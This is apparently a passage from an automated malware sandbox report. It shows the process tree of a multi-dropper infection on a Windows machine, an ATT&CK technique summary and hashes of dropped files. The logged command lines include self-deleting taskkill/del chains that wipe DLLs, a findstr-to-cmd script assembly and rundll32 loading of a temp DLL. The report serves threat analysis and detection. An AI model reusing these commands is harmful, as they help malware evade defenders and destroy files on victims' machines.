                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6212
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\ieDAaX62YOoJn1AN8Dpe8i29.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\ieDAaX62YOoJn1AN8Dpe8i29.exe"
                                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:8196
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\NMCei27TQabTbnUz_JgUMf7k.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\NMCei27TQabTbnUz_JgUMf7k.exe"
                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:7172
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\htE1VQVF_AujGdEEiVdZmUg3.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\htE1VQVF_AujGdEEiVdZmUg3.exe"
                                                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:8232
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\pNCthA4z2AJ0wGFP2RQzabD2.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\pNCthA4z2AJ0wGFP2RQzabD2.exe"
                                                                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:8332
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\GswJrDjn2ZjyHiUIiQHFB1ZL.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\GswJrDjn2ZjyHiUIiQHFB1ZL.exe"
                                                                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8376
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\4e_B3PPVK78HMS853t8tbo0a.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\4e_B3PPVK78HMS853t8tbo0a.exe"
                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:8560
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\bhBmxz4PkZoY45ORx7wDuxlN.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\bhBmxz4PkZoY45ORx7wDuxlN.exe"
                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:8480
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\vnIlzqn9WUMAFp5SE85F4u43.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\vnIlzqn9WUMAFp5SE85F4u43.exe"
                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:8436
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\ZUqxynW57Du7S0S9pSwDc4GL.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\ZUqxynW57Du7S0S9pSwDc4GL.exe"
                                                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:8296
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\QRo4gKYVx_5lBtN9eb6dSFyJ.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\QRo4gKYVx_5lBtN9eb6dSFyJ.exe"
                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5868
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\WuXQvRAyWFrJGvKE5mU6AR_F.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\WuXQvRAyWFrJGvKE5mU6AR_F.exe"
                                                                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:8700
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\2aMWcqPNoB2wieEk0Ahyz1XU.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\2aMWcqPNoB2wieEk0Ahyz1XU.exe"
                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:7800
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\HHnbZnrsvrCXR5Ku8ICTQKcm.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\HHnbZnrsvrCXR5Ku8ICTQKcm.exe"
                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6192
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im HHnbZnrsvrCXR5Ku8ICTQKcm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HHnbZnrsvrCXR5Ku8ICTQKcm.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:6916
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                      taskkill /im HHnbZnrsvrCXR5Ku8ICTQKcm.exe /f
                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                      PID:5140
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\3foTP_8N3jw8iskguRZrtGUj.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\3foTP_8N3jw8iskguRZrtGUj.exe"
                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7192
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\3foTP_8N3jw8iskguRZrtGUj.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\3foTP_8N3jw8iskguRZrtGUj.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:8180
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\6m4yMjfzMfKwGnJEogK5q1C6.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\6m4yMjfzMfKwGnJEogK5q1C6.exe"
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6828
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\tydI4PC2A7afdSh5UgrtCIL_.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\tydI4PC2A7afdSh5UgrtCIL_.exe"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6784
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im tydI4PC2A7afdSh5UgrtCIL_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\tydI4PC2A7afdSh5UgrtCIL_.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:6744
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                      taskkill /im tydI4PC2A7afdSh5UgrtCIL_.exe /f
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                      PID:6616
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                      PID:6056
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\2hmr0InkS2XcT2IPxNt4UAeE.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\2hmr0InkS2XcT2IPxNt4UAeE.exe"
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:6776
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6776 -s 664
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                      PID:6976
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6776 -s 672
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                      PID:6024
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6776 -s 636
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                      PID:5240
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6776 -s 816
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                      PID:2064
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\QswZ8tKiAtcpqWJIYKnhfbu6.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\QswZ8tKiAtcpqWJIYKnhfbu6.exe"
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:6768
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\obye6d6IVD6sRymINe2MXCz8.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\obye6d6IVD6sRymINe2MXCz8.exe"
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:6536
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7453027.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7453027.exe"
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:6036
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\2436830.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\2436830.exe"
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6840
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\gm4gYJ_5yE4F_ThLjjXzSEMb.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\gm4gYJ_5yE4F_ThLjjXzSEMb.exe"
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6528
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ks8XIDXCA3MWu2bfMhhy_4yr.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ks8XIDXCA3MWu2bfMhhy_4yr.exe"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:6368
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\ks8XIDXCA3MWu2bfMhhy_4yr.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\ks8XIDXCA3MWu2bfMhhy_4yr.exe
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6640
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Sxg7R8a2Y_69Dqj2zoak5hwM.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\Sxg7R8a2Y_69Dqj2zoak5hwM.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6316
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:7140
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          cmd
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6908
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                                                                                              findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:7972
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7200
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7872
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7940
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6592
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\hfatK0KwJ0DHrxrURupgK05f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\hfatK0KwJ0DHrxrURupgK05f.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6308
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\hfatK0KwJ0DHrxrURupgK05f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\hfatK0KwJ0DHrxrURupgK05f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5856
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im hfatK0KwJ0DHrxrURupgK05f.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\hfatK0KwJ0DHrxrURupgK05f.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8012
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              taskkill /im hfatK0KwJ0DHrxrURupgK05f.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7732
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\7C0cQtFUdXdrTM4ILC_WVRFb.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\7C0cQtFUdXdrTM4ILC_WVRFb.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6300
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\7C0cQtFUdXdrTM4ILC_WVRFb.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\7C0cQtFUdXdrTM4ILC_WVRFb.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4580
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\UaqKPbdyUCGCNgSWBzNM_QOj.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\UaqKPbdyUCGCNgSWBzNM_QOj.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6292
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\RJb1jZifnP_W55naoq01a_KF.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\RJb1jZifnP_W55naoq01a_KF.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6124
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\RJb1jZifnP_W55naoq01a_KF.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\RJb1jZifnP_W55naoq01a_KF.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7032
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2660
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4052
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6056
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6124
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6548
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6000
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5216
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5676
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:652
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6396
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 624
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5132

                                                                                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                            Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1018

                                                                                                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              d23f2c0d8e5419cb110919a6c3f5872d

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              1ba66b14505e80ced7cf38ff77b838a647d07918

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              adf79325cf557ac0d265e75eb77f52ad614c2f9ec49d323d283b04c81015b36d

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                              5e62a6066f143aef7a82d4c1902a564ba50dc81cbdd54b446db102ab29f9e0ba85aec123c5717001d97a0e50ef4d38d86ac5ce112e6047d3be130d03cb3ca02f

                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC937FF74\libcurl.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                              d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                              028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                              0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

